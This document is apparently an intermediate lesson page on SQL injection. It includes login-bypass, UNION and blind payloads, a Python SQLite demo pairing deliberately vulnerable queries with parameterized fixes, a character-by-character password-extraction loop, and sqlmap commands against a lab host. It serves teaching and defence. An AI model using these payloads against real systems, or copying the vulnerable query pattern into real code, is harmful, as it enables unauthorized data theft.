Lesson / Web Application Security

SQL Injection

Mixing user input into a SQL statement: the classic injection flaw (OWASP Top 10 A03:2021 Injection; it held the #1 spot in the 2013 and 2017 lists).

30 min, intermediate, 3 commands, 2/5
Objectives
  • Login bypass
  • UNION-based injection
  • Blind SQLi
Practice only in environments you are authorized to test

The commands in this lesson are meant for the training simulator and for labs you own. Scanning or probing systems that belong to someone else exposes you to legal liability.

Reading

Example payloads

  • Login bypass (string context): `admin' --` closes the username literal and comments out the password check, so the query matches the admin row.
  • UNION-based: `' UNION SELECT username,password FROM users--` appends a second result set. It only works when the injected SELECT returns the same number of columns as the original query (two here) with compatible types; in a numeric context such as `id=1` the leading quote is dropped.
  • Blind (boolean-based): `' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--` gives no data back directly; you vary the position and the candidate character and watch whether the response flips between "match" and "no match", one character per request.

Comment syntax caveat: in MySQL the `--` comment needs a trailing space (write `-- ` or use `#`); in PostgreSQL, MSSQL and SQLite a bare `--` is enough. When a payload that should work does nothing, check the comment form first.
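The three payload types above, run end to end against a local database, as an added example that is not part of the course material or its simulator. It assumes an in-memory SQLite database standing in for the target.lab backend, with constructed tables users(username, password) and items(id, name, price) and constructed rows; the blind loop uses SQLite's substr() spelling of SUBSTRING(). Each vulnerable query is shown next to its parameterized fix so the same payload can be tried against both.

```python
import sqlite3
import string

# Constructed sample data: an in-memory SQLite database standing in for the
# target.lab backend. Plaintext passwords are only so the demo has something
# to extract; a real application stores a password hash.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    conn.executemany("INSERT INTO items (name, price) VALUES (?, ?)",
                     [("widget", 9.99), ("gadget", 19.5)])
    conn.commit()
    return conn


# Vulnerable login: the statement is built by pasting raw input into the SQL text.
def login_vulnerable(conn, username, password):
    sql = f"SELECT username FROM users WHERE username='{username}' AND password='{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


# Fixed login: placeholders keep the input as data, so a quote in the
# username can never close the string literal.
def login_safe(conn, username, password):
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# Vulnerable item lookup: numeric context, so the payload needs no leading quote.
def item_vulnerable(conn, item_id):
    sql = f"SELECT name, price FROM items WHERE id={item_id}"
    return conn.execute(sql).fetchall()


# Fixed item lookup: reject anything that is not an integer, then bind it.
# Returns None for a rejected id (a web app would answer 400 here).
def item_safe(conn, item_id):
    try:
        item_id = int(item_id)
    except (TypeError, ValueError):
        return None
    return conn.execute("SELECT name, price FROM items WHERE id=?", (item_id,)).fetchall()


# Boolean-based blind extraction through the vulnerable login: the only
# feedback is "logged in or not", and one oracle query is spent per
# candidate character. substr() is SQLite's spelling of SUBSTRING().
def blind_extract_password(conn, target_user="admin", max_len=32):
    alphabet = string.ascii_letters + string.digits + "_-!@#$%^&*."
    recovered = ""
    while len(recovered) < max_len:
        position = len(recovered) + 1
        for ch in alphabet:
            probe = (f"{target_user}' AND substr((SELECT password FROM users "
                     f"WHERE username='{target_user}'),{position},1)='{ch}'--")
            if login_vulnerable(conn, probe, "x") is not None:
                recovered += ch
                break
        else:
            break  # no candidate matched: the string has ended
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("bypass :", login_vulnerable(db, "admin'--", "x"))   # admin
    print("fixed  :", login_safe(db, "admin'--", "x"))         # None
    print("union  :", item_vulnerable(db, "1 UNION SELECT username,password FROM users--"))
    print("fixed  :", item_safe(db, "1 UNION SELECT username,password FROM users--"))  # None
    print("blind  :", blind_extract_password(db))              # s3cret
```

The blind loop is the expensive part: recovering a six-character password costs up to len(alphabet) requests per position, which is why sqlmap's boolean-based mode uses a binary search over the character code instead of a linear scan. The fix in both safe functions is the same idea the lesson is driving at: never let input become part of the SQL text; bind it as a parameter and validate its type first.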

Commands

The Run button sends the command to the simulator on the right; Copy is for your own Kali terminal.

$ curl "http://target.lab/login?u=admin'--&p=x"
Expected result: Welcome
$ sqlmap -u 'http://target.lab/item?id=1' --dbs
--dbs enumerates the databases reachable through the injectable id parameter.
$ sqlmap -u 'http://target.lab/item?id=1' -D shop --tables
-D shop --tables lists the tables in the shop database found in the previous step.